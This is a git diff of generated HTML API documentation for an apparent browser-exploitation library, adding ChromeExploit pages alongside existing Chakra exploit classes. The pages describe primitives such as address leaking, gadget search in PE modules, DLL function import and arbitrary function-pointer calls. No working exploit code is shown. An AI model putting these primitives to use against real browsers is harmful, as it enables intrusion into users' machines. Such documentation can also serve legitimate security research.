- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_IntType.html b/docs/ChakraExploit_IntType.html index fabe989..5198d5d 100644 --- a/docs/ChakraExploit_IntType.html +++ b/docs/ChakraExploit_IntType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new IntTypeSource:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_Pointer.html b/docs/ChakraExploit_Pointer.html index ec791cd..76ec349 100644 --- a/docs/ChakraExploit_Pointer.html +++ b/docs/ChakraExploit_Pointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new PointerSource:
@@ -243,7 +243,7 @@
Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_PointerType.html b/docs/ChakraExploit_PointerType.html index 59a0198..df6f9cb 100644 --- a/docs/ChakraExploit_PointerType.html +++ b/docs/ChakraExploit_PointerType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Pointe
Source:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_StructPointer.html b/docs/ChakraExploit_StructPointer.html index 9202830..4ec806d 100644 --- a/docs/ChakraExploit_StructPointer.html +++ b/docs/ChakraExploit_StructPointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Stru
Source:
@@ -243,7 +243,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_StructType.html b/docs/ChakraExploit_StructType.html index 0547260..edbc3ba 100644 --- a/docs/ChakraExploit_StructType.html +++ b/docs/ChakraExploit_StructType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new StructT
Source:
@@ -274,7 +274,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_Thread.html b/docs/ChakraExploit_Thread.html index 14403fc..e515131 100644 --- a/docs/ChakraExploit_Thread.html +++ b/docs/ChakraExploit_Thread.html @@ -22,7 +22,7 @@
@@ -334,7 +334,7 @@

postMessag
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_Type.html b/docs/ChakraExploit_Type.html index 8796bfa..3625904 100644 --- a/docs/ChakraExploit_Type.html +++ b/docs/ChakraExploit_Type.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new TypeSource:
@@ -171,7 +171,7 @@

new Type
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_WString.html b/docs/ChakraExploit_WString.html index ff6f8fd..426f2fc 100644 --- a/docs/ChakraExploit_WString.html +++ b/docs/ChakraExploit_WString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new WStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit.html b/docs/ChakraThreadExploit.html index afbdaf2..44a268d 100644 --- a/docs/ChakraThreadExploit.html +++ b/docs/ChakraThreadExploit.html @@ -22,7 +22,7 @@
@@ -209,7 +209,7 @@

Int8Source:
@@ -283,7 +283,7 @@

Int8PtrSource:
@@ -357,7 +357,7 @@

Int16Source:
@@ -431,7 +431,7 @@

Int16PtrSource:
@@ -505,7 +505,7 @@

Int32Source:
@@ -579,7 +579,7 @@

Int32PtrSource:
@@ -653,7 +653,7 @@

Int64Source:
@@ -727,7 +727,7 @@

Int64PtrSource:
@@ -801,7 +801,7 @@

Uint8Source:
@@ -875,7 +875,7 @@

Uint8PtrSource:
@@ -949,7 +949,7 @@

Uint16Source:
@@ -1023,7 +1023,7 @@

Uint16PtrSource:
@@ -1097,7 +1097,7 @@

Uint32Source:
@@ -1171,7 +1171,7 @@

Uint32PtrSource:
@@ -1245,7 +1245,7 @@

Uint64Source:
@@ -1319,7 +1319,7 @@

Uint64PtrSource:
@@ -1403,7 +1403,7 @@

addressOfSource:
@@ -1547,7 +1547,7 @@
Returns:
-

addressOfSlow(obj) → {Pointer}

+

addressOfArrayBuffer(ab) → {Pointer}

@@ -1559,7 +1559,7 @@

addressO
Source:
@@ -1570,7 +1570,7 @@

addressO
Inherited From:
@@ -1604,7 +1604,7 @@

addressO
- Returns the address of a Javascript object. Internal. + Returns the address of ArrayBuffer contents.
@@ -1642,13 +1642,13 @@

Parameters:
- obj + ab -* +ArrayBuffer @@ -1658,7 +1658,7 @@
Parameters:
- Any Javascript object + ArrayBuffer @@ -1703,7 +1703,7 @@
Returns:
-

addressOfString(s) → {Pointer}

+

addressOfSlow(obj) → {Pointer}

@@ -1715,7 +1715,7 @@

addres
Source:
@@ -1726,7 +1726,7 @@

addres
Inherited From:
@@ -1760,7 +1760,7 @@

addres
- Returns the address of a string. Points to the string's bytes. + Returns the address of a Javascript object. Internal.
@@ -1798,13 +1798,13 @@

Parameters:
- s + obj -string +* @@ -1814,7 +1814,7 @@
Parameters:
- A Javascript string + Any Javascript object @@ -1871,7 +1871,7 @@

callSource:
@@ -2070,7 +2070,7 @@

findGadget<
Source:
@@ -2252,7 +2252,7 @@

findGadget
Source:
@@ -2434,7 +2434,7 @@

findMod
Source:
@@ -2590,7 +2590,7 @@

importF
Source:
@@ -3287,7 +3287,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_ArrayType.html b/docs/ChakraThreadExploit_ArrayType.html index 5d86957..cf7faad 100644 --- a/docs/ChakraThreadExploit_ArrayType.html +++ b/docs/ChakraThreadExploit_ArrayType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new ArrayTyp
Source:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_CString.html b/docs/ChakraThreadExploit_CString.html index f5b9f4a..f16db3e 100644 --- a/docs/ChakraThreadExploit_CString.html +++ b/docs/ChakraThreadExploit_CString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new CStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_FunctionType.html b/docs/ChakraThreadExploit_FunctionType.html index f61d7dc..e9788f7 100644 --- a/docs/ChakraThreadExploit_FunctionType.html +++ b/docs/ChakraThreadExploit_FunctionType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Funct
Source:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_IntType.html b/docs/ChakraThreadExploit_IntType.html index fffe4aa..8e6cd74 100644 --- a/docs/ChakraThreadExploit_IntType.html +++ b/docs/ChakraThreadExploit_IntType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new IntTypeSource:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_Pointer.html b/docs/ChakraThreadExploit_Pointer.html index 5956a15..9385a3e 100644 --- a/docs/ChakraThreadExploit_Pointer.html +++ b/docs/ChakraThreadExploit_Pointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new PointerSource:
@@ -243,7 +243,7 @@
Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_PointerType.html b/docs/ChakraThreadExploit_PointerType.html index 848cab3..3279fa2 100644 --- a/docs/ChakraThreadExploit_PointerType.html +++ b/docs/ChakraThreadExploit_PointerType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Pointe
Source:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_StructPointer.html b/docs/ChakraThreadExploit_StructPointer.html index 65c02d7..c230d15 100644 --- a/docs/ChakraThreadExploit_StructPointer.html +++ b/docs/ChakraThreadExploit_StructPointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Stru
Source:
@@ -243,7 +243,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_StructType.html b/docs/ChakraThreadExploit_StructType.html index 1622148..a38349e 100644 --- a/docs/ChakraThreadExploit_StructType.html +++ b/docs/ChakraThreadExploit_StructType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new StructT
Source:
@@ -274,7 +274,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_Thread.html b/docs/ChakraThreadExploit_Thread.html index 3d5af75..49a4c48 100644 --- a/docs/ChakraThreadExploit_Thread.html +++ b/docs/ChakraThreadExploit_Thread.html @@ -22,7 +22,7 @@
@@ -171,7 +171,7 @@

new Thread
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_Type.html b/docs/ChakraThreadExploit_Type.html index 3ccd234..dc0726f 100644 --- a/docs/ChakraThreadExploit_Type.html +++ b/docs/ChakraThreadExploit_Type.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new TypeSource:
@@ -171,7 +171,7 @@

new Type
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_WString.html b/docs/ChakraThreadExploit_WString.html index 4e9c434..15a27a1 100644 --- a/docs/ChakraThreadExploit_WString.html +++ b/docs/ChakraThreadExploit_WString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new WStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChromeExploit.html b/docs/ChromeExploit.html new file mode 100644 index 0000000..39056ec --- /dev/null +++ b/docs/ChromeExploit.html @@ -0,0 +1,2915 @@ + + + + + ChromeExploit - Documentation + + + + + + + + + + + + + + + + +
+ +

ChromeExploit

+ + + + + + + +
+ +
+ +

+ ChromeExploit +

+ + +
+ +
+
+ + + + + +

new ChromeExploit()

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs an exploit with sensible defaults for Chrome. Child must call initChrome method once read and write methods are available. +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + + + + + + + + + +

Classes

+ +
+
ArrayType
+
+ +
CString
+
+ +
FunctionType
+
+ +
IntType
+
+ +
Pointer
+
+ +
PointerType
+
+ +
StructPointer
+
+ +
StructType
+
+ +
Type
+
+ +
WString
+
+
+ + + + + + + +

Members

+ + + +

Int8 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Int8Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + +

Int16 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Int16Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + +

Int32 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Int32Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + +

Int64 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Int64Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + +

Uint8 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Uint8Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + +

Uint16 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Uint16Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + +

Uint32 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Uint32Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + +

Uint64 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
    • +
+ + + + + + + + +

Uint64Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
    • +
+ + + + + + + + + + +

Methods

+ + + + + + +

addressOf(obj) → {Pointer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Returns the address of a Javascript object. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
obj + + +* + + + + Any Javascript object
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Pointer + + +
+
+ + + + + + + + + +

addressOfArrayBuffer(ab) → {Pointer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Returns the address of ArrayBuffer contents. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
ab + + +ArrayBuffer + + + + ArrayBuffer
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Pointer + + +
+
+ + + + + + + + + +

addressOfSlow(obj) → {Pointer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Returns the address of a Javascript object. Internal. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
obj + + +* + + + + Any Javascript object
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Pointer + + +
+
+ + + + + + + + + +

call(address, …args) → {Integer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Call a function pointer with the given arguments. Used internally by FunctionPointer. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeAttributesDescription
address + + +Integer + + + + + + + + + +
args + + +Integer + + + + + + + + + + <repeatable>
+ +
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Integer + + +
+
+ + + + + + + + + +

findGadget(module, bytes) → {Integer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Find a set of bytes in a PE module. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
module + + +Integer +| + +Pointer + + + + Base address of PE module
bytes + + +Array + + + + Bytes to locate
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Integer + + +
+
+ + + + + + + + + +

findGadgets(module, query) → {object}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Find multiple sets of bytes in a PE module. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
module + + +Integer +| + +Pointer + + + + Base address of PE module
query + + +Array + + + + Array of gadgets to find
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +object + + +
+
+ + + + + + + + + +

findModuleBase(address) → {Integer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Find the beginning of a PE module given any address in the module. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
address + + +Integer + + + + Any address in the PE module
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Integer + + +
+
+ + + + + + + + + +

importFunction(dllName, funcName, returnType) → {function}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Loads a DLL (if not loaded already) and finds the given export. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
dllName + + +string + + + + The name of DLL to find the function from.
funcName + + +string + + + + The name of function to import.
returnType + + +Type + + + + The type of the function return.
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +function + + +
+
+ + + + + + + + + +

initChrome(vtable)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Initializes Chrome helpers using memory read and write. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
vtable + + +Integer +| + +Pointer + + + + Any address in the chrome DLL
+ + + + + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_ArrayType.html b/docs/ChromeExploit_ArrayType.html new file mode 100644 index 0000000..831cf67 --- /dev/null +++ b/docs/ChromeExploit_ArrayType.html @@ -0,0 +1,263 @@ + + + + + ArrayType - Documentation + + + + + + + + + + + + + + + + +
+ +

ArrayType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + ArrayType +

+ + +
+ +
+
+ + + + + +

new ArrayType(base, length)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs an array type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + Base type
length + + +integer + + + + Number of array elements
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
    • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_CString.html b/docs/ChromeExploit_CString.html new file mode 100644 index 0000000..c2e5f25 --- /dev/null +++ b/docs/ChromeExploit_CString.html @@ -0,0 +1,240 @@ + + + + + CString - Documentation + + + + + + + + + + + + + + + + +
+ +

CString

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + CString +

+ + +
+ +
+
+ + + + + +

new CString(s)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a C string. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
s + + +string + + + + A string to make into a C string.
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Pointer
    • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_FunctionType.html b/docs/ChromeExploit_FunctionType.html new file mode 100644 index 0000000..99b93bb --- /dev/null +++ b/docs/ChromeExploit_FunctionType.html @@ -0,0 +1,240 @@ + + + + + FunctionType - Documentation + + + + + + + + + + + + + + + + +
+ +

FunctionType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + FunctionType +

+ + +
+ +
+
+ + + + + +

new FunctionType(returnType)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a function pointer type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
returnType + + +Type + + + + Type of return value
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
    • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_IntType.html b/docs/ChromeExploit_IntType.html new file mode 100644 index 0000000..c0aa736 --- /dev/null +++ b/docs/ChromeExploit_IntType.html @@ -0,0 +1,263 @@ + + + + + IntType - Documentation + + + + + + + + + + + + + + + + +
+ +

IntType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + IntType +

+ + +
+ +
+
+ + + + + +

new IntType(bits, signed)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs an integer type. Internal. Use predefined Int and Uint type objects. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
bits + + +integer + + + + Bit size
signed + + +boolean + + + + Whether signed or not
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
    • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_Pointer.html b/docs/ChromeExploit_Pointer.html new file mode 100644 index 0000000..bf93e57 --- /dev/null +++ b/docs/ChromeExploit_Pointer.html @@ -0,0 +1,252 @@ + + + + + Pointer - Documentation + + + + + + + + + + + + + + + + +
+ +

Pointer

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + Pointer +

+ + +
+ +
+
+ + + + + +

new Pointer(base, address)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a certain type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + type
address + + +Integer + + + +
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_PointerType.html b/docs/ChromeExploit_PointerType.html new file mode 100644 index 0000000..5cb7b2c --- /dev/null +++ b/docs/ChromeExploit_PointerType.html @@ -0,0 +1,240 @@ + + + + + PointerType - Documentation + + + + + + + + + + + + + + + + +
+ +

PointerType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + PointerType +

+ + +
+ +
+
+ + + + + +

new PointerType(base)

+ + + + + + +
+ + +
Source:
+
